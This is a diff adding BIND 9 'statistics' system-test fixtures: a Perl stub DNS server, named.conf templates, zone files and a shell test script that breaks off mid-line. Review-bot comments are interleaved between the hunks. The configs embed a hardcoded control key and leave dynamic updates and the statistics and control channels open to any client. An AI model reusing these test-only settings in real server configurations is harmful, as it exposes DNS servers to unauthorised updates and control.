@@ -0,0 +1,118 @@ +#!/usr/bin/perl -w + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Ad hoc name server +# + +use IO::File; +use IO::Socket; +use Net::DNS; +use Net::DNS::Packet; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $sock = IO::Socket::INET->new(LocalAddr => "10.53.0.4", + LocalPort => $localport, Proto => "udp") or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +for (;;) { + $sock->recv($buf, 512); + + print "**** request from " , $sock->peerhost, " port ", $sock->peerport, "\n"; + + my $packet; + + if ($Net::DNS::VERSION > 0.68) { + $packet = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($packet, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + print "REQUEST:\n"; + $packet->print; + + $packet->header->qr(1); + + my @questions = $packet->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + + my $donotrespond = 0; + + if ($qname eq "foo.info") { + $donotrespond = 1; + } elsif ($qname eq "cname1.example.com") { + # Data for the "cname + other data / 1" test + $packet->push("answer", new Net::DNS::RR("cname1.example.com 300 CNAME cname1.example.com")); + $packet->push("answer", new Net::DNS::RR("cname1.example.com 300 A 1.2.3.4")); + } elsif ($qname eq "cname2.example.com") { + # Data for the "cname + other data / 2" test: same RRs 
in opposite order + $packet->push("answer", new Net::DNS::RR("cname2.example.com 300 A 1.2.3.4")); + $packet->push("answer", new Net::DNS::RR("cname2.example.com 300 CNAME cname2.example.com")); + } elsif ($qname eq "www.example.org" || $qname eq "www.example.net" || + $qname eq "badcname.example.org" || + $qname eq "goodcname.example.org" || + $qname eq "foo.baddname.example.org" || + $qname eq "foo.gooddname.example.org") { + # Data for address/alias filtering. + $packet->header->aa(1); + if ($qtype eq "A") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 300 A 192.0.2.1")); + } elsif ($qtype eq "AAAA") { + $packet->push("answer", + new Net::DNS::RR($qname . + " 300 AAAA 2001:db8:beef::1")); + } + } elsif ($qname eq "badcname.example.net" || + $qname eq "goodcname.example.net") { + # Data for CNAME/DNAME filtering. We need to make one-level + # delegation to avoid automatic acceptance for subdomain aliases + $packet->push("authority", new Net::DNS::RR("example.net 300 NS ns.example.net")); + $packet->push("additional", new Net::DNS::RR("ns.example.net 300 A 10.53.0.3")); + } elsif ($qname =~ /^nodata\.example\.net$/i) { + $packet->header->aa(1); + } elsif ($qname =~ /^nxdomain\.example\.net$/i) { + $packet->header->aa(1); + $packet->header->rcode(NXDOMAIN); + } elsif ($qname =~ /sub\.example\.org/) { + # Data for CNAME/DNAME filtering. The final answers are + # expected to be accepted regardless of the filter setting. 
+ $packet->push("authority", new Net::DNS::RR("sub.example.org 300 NS ns.sub.example.org")); + $packet->push("additional", new Net::DNS::RR("ns.sub.example.org 300 A 10.53.0.3")); + } else { + # Data for the "bogus referrals" test + $packet->push("authority", new Net::DNS::RR("below.www.example.com 300 NS ns.below.www.example.com")); + $packet->push("additional", new Net::DNS::RR("ns.below.www.example.com 300 A 10.53.0.3")); + } + + if ($donotrespond == 0) { + $sock->send($packet->data); + print "RESPONSE:\n"; + $packet->print; + print "\n"; + } +} diff --git a/bin/tests/system/statistics/clean.sh b/bin/tests/system/statistics/clean.sh new file mode 100644 index 0000000..da49585 --- /dev/null +++ b/bin/tests/system/statistics/clean.sh @@ -0,0 +1,32 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after zone transfer tests. +# + +rm -f ns3/example.bk +rm -f ns3/internal.bk +rm -f */named.conf +rm -f */named.memstats +rm -f */named.run +rm -f */ans.run +rm -f */named.stats +rm -f */named.stats-stage* +rm -f dig.out* +rm -f curl.out.* +rm -f ns*/named.lock +rm -f stats*out +rm -f ns*/managed-keys.bind* +rm -f xsltproc.out.* +rm -f named.stats.* diff --git a/bin/tests/system/statistics/ns1/named.conf.in b/bin/tests/system/statistics/ns1/named.conf.in new file mode 100644 index 0000000..8fd14f9 --- /dev/null +++ b/bin/tests/system/statistics/ns1/named.conf.in 
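Review bot: The receive loop in ans.pl indexes `$questions[0]` without checking that the request carries a question, and both parse branches `die` on a packet Net::DNS cannot decode. A single stray or truncated datagram reaching 10.53.0.4 therefore ends the helper, and later checks that depend on it fail for an unrelated reason. Skipping the datagram keeps the fixture alive: `if ($@) { print "parse error: $@\n"; next; }` in place of `$@ and die $@;` (and likewise for `$err`), plus `next unless @questions;` before `my $qname = ...`. The return value of `$sock->recv($buf, 512)` is not checked either, and `$buf` is an undeclared global because the file has no `use strict`.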
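Review bot: The header comment in statistics/clean.sh says `Clean up after zone transfer tests.`, which looks carried over from another test directory; `# Clean up after statistics tests.` would match where the file lives. The `ns3/example.bk` and `ns3/internal.bk` entries may be leftovers for the same reason: the secondary zone in this commit's ns3/named.conf.in writes `sec.bk`, and nothing here removes it. If that file can be created during a run, add `rm -f ns3/sec.bk`.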
@@ -0,0 +1,44 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+ notify yes;
+};
+
+statistics-channels {
+ inet 10.53.0.1 port @EXTRAPORT1@ allow { any; };
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
+
+zone "example.info." {
+ type primary;
+ file "example-info.db";
+};
+
+zone "32/1.0.0.127-in-addr.example." {
+ type primary;
+ file "zone.db";
+};
diff --git a/bin/tests/system/statistics/ns1/root.db b/bin/tests/system/statistics/ns1/root.db
new file mode 100644
index 0000000..17780d1
--- /dev/null
+++ b/bin/tests/system/statistics/ns1/root.db
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
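Review bot: The stanza `inet 10.53.0.1 port @EXTRAPORT1@ allow { any; };` in statistics/ns1/named.conf.in opens the statistics channel to every client that can reach the address, and the same `allow { any; }` is repeated in ns2/named.conf.in, ns2/named2.conf.in and ns3/named.conf.in. That is presumably acceptable because 10.53.0.x exists only on the test host, but the file does not say so and fixtures like this get copied as starting points. I would add a comment above the stanza, `/* test fixture only: statistics channel is open to any client */`, or restrict the ACL to the test addresses if the checks that read the channel allow it.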
diff --git a/bin/tests/system/statistics/ns1/zone.db b/bin/tests/system/statistics/ns1/zone.db
new file mode 100644
index 0000000..7feee2c
--- /dev/null
+++ b/bin/tests/system/statistics/ns1/zone.db
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 3600 IN SOA ns.example. hostmaster.example. 1 3600 1200 604800 3600
+@ 3600 IN NS ns.example.
+ns.example. 3600 IN A 10.53.0.1
diff --git a/bin/tests/system/statistics/ns2/example.db b/bin/tests/system/statistics/ns2/example.db
new file mode 100644
index 0000000..4d60ce3
--- /dev/null
+++ b/bin/tests/system/statistics/ns2/example.db
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN .
+$TTL 300 ; 5 minutes
+example IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
+
+$ORIGIN example.
+a A 10.0.0.1
+ MX 10 mail.example.
+
+mail A 10.0.0.2
diff --git a/bin/tests/system/statistics/ns2/internal.db b/bin/tests/system/statistics/ns2/internal.db
new file mode 100644
index 0000000..4f1014f
--- /dev/null
+++ b/bin/tests/system/statistics/ns2/internal.db
@@ -0,0 +1,30 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN .
+$TTL 300 ; 5 minutes
+example IN SOA mname1. . (
+ 2 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
+example. NS ns3.example.
+ns3.example. A 10.53.0.3
+
+$ORIGIN example.
+a A 10.1.0.1
+ MX 10 intmail.example.
+
+intmail A 10.1.0.2
diff --git a/bin/tests/system/statistics/ns2/named.conf.in b/bin/tests/system/statistics/ns2/named.conf.in
new file mode 100644
index 0000000..4e02037
--- /dev/null
+++ b/bin/tests/system/statistics/ns2/named.conf.in
@@ -0,0 +1,50 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ notify yes;
+};
+
+statistics-channels {
+ inet 10.53.0.2 port @EXTRAPORT1@ allow { any; };
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+ allow-update { any; };
+};
diff --git a/bin/tests/system/statistics/ns2/named2.conf.in b/bin/tests/system/statistics/ns2/named2.conf.in
new file mode 100644
index 0000000..f2deebf
--- /dev/null
+++ b/bin/tests/system/statistics/ns2/named2.conf.in
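Review bot: Zone `example` in statistics/ns2/named.conf.in is configured with `allow-update { any; };`, and the control channel with `allow { any; } keys { rndc_key; }` using the literal secret `"1234abcd8765"`; ns2/named2.conf.in and ns3/named.conf.in repeat both. For a fixture bound to a test address this is workable, but nothing in the file marks it as such. A comment above the `key` block, `/* well-known test key, never use outside the system tests */`, and one next to `allow-update` would keep these settings from being read as an example. If the tests in this directory never send a dynamic update, dropping `allow-update` is the smaller change; the visible part of statistics/tests.sh shows none, but that hunk continues past what I can see.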
@@ -0,0 +1,50 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+};
+
+statistics-channels {
+ inet 10.53.0.2 port @EXTRAPORT1@ allow { any; };
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+ allow-update { any; };
+ zone-statistics full;
+};
diff --git a/bin/tests/system/statistics/ns3/internal.db b/bin/tests/system/statistics/ns3/internal.db
new file mode 100644
index 0000000..c93c2b0
--- /dev/null
+++ b/bin/tests/system/statistics/ns3/internal.db
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN .
+$TTL 300 ; 5 minutes
+example IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+example. NS ns3.example.
+ns3.example. A 10.53.0.3
+
+$ORIGIN example.
+a A 10.1.0.1
+ MX 10 intmail.example.
+
+intmail A 10.1.0.2
diff --git a/bin/tests/system/statistics/ns3/named.conf.in b/bin/tests/system/statistics/ns3/named.conf.in
new file mode 100644
index 0000000..62613a1
--- /dev/null
+++ b/bin/tests/system/statistics/ns3/named.conf.in
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ directory ".";
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ notify yes;
+ qname-minimization disabled;
+ zone-statistics yes;
+ glue-cache yes;
+};
+
+statistics-channels {
+ inet 10.53.0.3 port @EXTRAPORT1@ allow { any; };
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "root.hint";
+};
+
+zone "example" {
+ type primary;
+ allow-update { any; };
+ file "internal.db";
+};
+
+zone "a-secondary" {
+ type secondary;
+ file "sec.bk";
+ primaries { 10.53.0.1; };
+};
diff --git a/bin/tests/system/statistics/ns3/root.hint b/bin/tests/system/statistics/ns3/root.hint
new file mode 100644
index 0000000..dbc4a42
--- /dev/null
+++ b/bin/tests/system/statistics/ns3/root.hint
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 999999
+. IN NS d.root-servers.nil.
+d.root-servers.nil. IN A 10.53.0.4
diff --git a/bin/tests/system/statistics/prereq.sh b/bin/tests/system/statistics/prereq.sh
new file mode 100644
index 0000000..221138f
--- /dev/null
+++ b/bin/tests/system/statistics/prereq.sh
@@ -0,0 +1,29 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if $PERL -e 'use Net::DNS;' 2>/dev/null
+then
+ if $PERL -e 'use Net::DNS; die if ($Net::DNS::VERSION >= 0.76 && $Net::DNS::VERSION <= 0.77);' 2>/dev/null
+ then
+ :
+ else
+ echo_i "Net::DNS version 0.76 and 0.77 have a bug that causes this test to fail: please update." >&2
+ exit 1
+ fi
+else
+ echo_i "This test requires the Net::DNS library." >&2
+ exit 1
+fi
diff --git a/bin/tests/system/statistics/setup.sh b/bin/tests/system/statistics/setup.sh
new file mode 100644
index 0000000..57e0575
--- /dev/null
+++ b/bin/tests/system/statistics/setup.sh
@@ -0,0 +1,19 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
diff --git a/bin/tests/system/statistics/tests.sh b/bin/tests/system/statistics/tests.sh
new file mode 100644
index 0000000..5e0b237
--- /dev/null
+++ b/bin/tests/system/statistics/tests.sh
@@ -0,0 +1,280 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +noadd +nosea +nostat +noquest +nocomm +nocmd" +DIGCMD="$DIG $DIGOPTS -p ${PORT}" +RNDCCMD="$RNDC -p ${CONTROLPORT} -c ../common/rndc.conf" + +status=0 + +ret=0 +n=1 +stats=0 +rndc_stats() { + _ns=$1 + _ip=$2 + + $RNDCCMD -s $_ip stats > /dev/null 2>&1 || return 1 + [ -f "${_ns}/named.stats" ] || return 1 + + last_stats=named.stats.$_ns-$stats-$n + mv ${_ns}/named.stats $last_stats + stats=$((stats+1)) +} + +echo_i "fetching a.example from ns2's initial configuration ($n)" +$DIGCMD +noauth a.example. 
@10.53.0.2 any > dig.out.ns2.1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "dumping initial stats for ns2 ($n)" +rndc_stats ns2 10.53.0.2 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "verifying adb records in named.stats ($n)" +grep "ADB stats" $last_stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "checking for 1 entry in adb hash table in named.stats ($n)" +grep "1 Addresses in hash table" $last_stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "verifying cache statistics in named.stats ($n)" +grep "Cache Statistics" $last_stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "checking for 2 entries in adb hash table in named.stats ($n)" +$DIGCMD a.example.info. @10.53.0.2 any > /dev/null 2>&1 +rndc_stats ns2 10.53.0.2 || ret=1 +grep "2 Addresses in hash table" $last_stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "dumping initial stats for ns3 ($n)" +rndc_stats ns3 10.53.0.3 || ret=1 +if [ ! "$CYGWIN" ]; then + nsock0nstat=`grep "UDP/IPv4 sockets active" $last_stats | awk '{print $1}'` + [ 0 -ne ${nsock0nstat:-0} ] || ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "sending queries to ns3" +$DIGCMD +tries=2 +time=1 +recurse @10.53.0.3 foo.info. 
any > /dev/null 2>&1 + +ret=0 +echo_i "dumping updated stats for ns3 ($n)" +getstats() { + rndc_stats ns3 10.53.0.3 || return 1 + grep "2 recursing clients" $last_stats > /dev/null || return 1 +} +retry_quiet 5 getstats || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "verifying recursing clients output in named.stats ($n)" +grep "2 recursing clients" $last_stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "verifying active fetches output in named.stats ($n)" +grep "1 active fetches" $last_stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +if [ ! "$CYGWIN" ]; then + ret=0 + echo_i "verifying active sockets output in named.stats ($n)" + nsock1nstat=`grep "UDP/IPv4 sockets active" $last_stats | awk '{print $1}'` + [ `expr ${nsock1nstat:-0} - ${nsock0nstat:-0}` -eq 1 ] || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` + n=`expr $n + 1` +fi + +# there should be 1 UDP and no TCP queries. As the TCP counter is zero +# no status line is emitted. 
+ret=0 +echo_i "verifying queries in progress in named.stats ($n)" +grep "1 UDP queries in progress" $last_stats > /dev/null || ret=1 +grep "TCP queries in progress" $last_stats > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "verifying bucket size output ($n)" +grep "bucket size" $last_stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "checking priming queries are counted ($n)" +grep "priming queries" $last_stats > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "checking that zones with slash are properly shown in XML output ($n)" +if $FEATURETEST --have-libxml2 && [ -x ${CURL} ] ; then + ${CURL} http://10.53.0.1:${EXTRAPORT1}/xml/v3/zones > curl.out.${n} 2>/dev/null || ret=1 + grep '<zone name="32/1.0.0.127-in-addr.example" rdataclass="IN">' curl.out.${n} > /dev/null || ret=1 +else + echo_i "skipping test as libxml2 and/or curl was not found" +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "checking that zones return their type ($n)" +if $FEATURETEST --have-libxml2 && [ -x ${CURL} ] ; then + ${CURL} http://10.53.0.1:${EXTRAPORT1}/xml/v3/zones > curl.out.${n} 2>/dev/null || ret=1 + grep '<zone name="32/1.0.0.127-in-addr.example" rdataclass="IN"><type>master</type>' curl.out.${n} > /dev/null || ret=1 +else + echo_i "skipping test as libxml2 and/or curl was not found" +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "checking bind9.xsl vs xml ($n)" +if $FEATURETEST --have-libxml2 && [ -x "${CURL}" ] && [ -x "${XSLTPROC}" ] ; then + $DIGCMD +notcp +recurse @10.53.0.3 soa . 
> /dev/null 2>&1 + $DIGCMD +notcp +recurse @10.53.0.3 soa example > /dev/null 2>&1 + ${CURL} http://10.53.0.3:${EXTRAPORT1}/xml/v3 > curl.out.${n}.xml 2>/dev/null || ret=1 + ${CURL} http://10.53.0.3:${EXTRAPORT1}/bind9.xsl > curl.out.${n}.xsl 2>/dev/null || ret=1 + ${XSLTPROC} curl.out.${n}.xsl - < curl.out.${n}.xml > xsltproc.out.${n} 2>/dev/null || ret=1 + cp curl.out.${n}.xml stats.xml.out || ret=1 + + # + # grep for expected sections. + # + grep "<h1>ISC Bind 9 Configuration and Statistics</h1>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Server Status</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Incoming Requests by DNS Opcode</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h3>Incoming Queries by Query Type</h3>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Outgoing Queries per view</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h3>View " xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Server Statistics</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Zone Maintenance Statistics</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Resolver Statistics (Common)</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h3>Resolver Statistics for View " xsltproc.out.${n} >/dev/null || ret=1 + grep "<h3>ADB Statistics for View " xsltproc.out.${n} >/dev/null || ret=1 + grep "<h3>Cache Statistics for View " xsltproc.out.${n} >/dev/null || ret=1 + # grep "<h3>Cache DB RRsets for View " xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Traffic Size Statistics</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h4>UDP Requests Received</h4>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h4>UDP Responses Sent</h4>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h4>TCP Requests Received</h4>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h4>TCP Responses Sent</h4>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Socket I/O Statistics</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h3>Zones for View " xsltproc.out.${n} 
>/dev/null || ret=1 + grep "<h2>Received QTYPES per view/zone</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h3>View _default" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h4>Zone example" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Response Codes per view/zone</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h3>View _default" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h4>Zone example" xsltproc.out.${n} >/dev/null || ret=1 + # grep "<h2>Glue cache statistics</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h3>View _default" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h4>Zone example" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Network Status</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Task Manager Configuration</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Tasks</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Memory Usage Summary</h2>" xsltproc.out.${n} >/dev/null || ret=1 + grep "<h2>Memory Contexts</h2>" xsltproc.out.${n} >/dev/null || ret=1 +else + echo_i "skipping test as libxml2 and/or curl and/or xsltproc was not found" +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +ret=0 +echo_i "checking bind9.xml socket statistics ($n)" +if $FEATURETEST --have-libxml2 && [ -x "${CURL}" ] && [ -x "${XSLTPROC}" ] ; then + # Socket statistics (expect no errors) + grep "<counter 